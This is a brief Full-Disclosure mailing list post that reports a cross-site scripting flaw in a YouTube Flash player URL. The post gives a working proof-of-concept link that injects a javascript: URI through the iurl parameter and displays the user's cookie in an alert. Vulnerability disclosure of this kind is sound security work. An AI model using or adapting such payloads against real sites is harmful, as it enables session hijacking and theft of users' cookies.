Merry Christmas Youtube! (XSS vuln)

[Paul <pvnick () gmail com>]

The following URL will cause javascript to execute in the context of youtube

http://www.youtube.com/p.swf?video_id=eVFF98kNg8Q&eurl=&t=&iurl=javascript:alert('Javascript%20executed!\r\n\r\nLocation:
'%2bwindow.location%2b'\r\n\r\nCookie: '%2bdocument.cookie)

Cheers

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/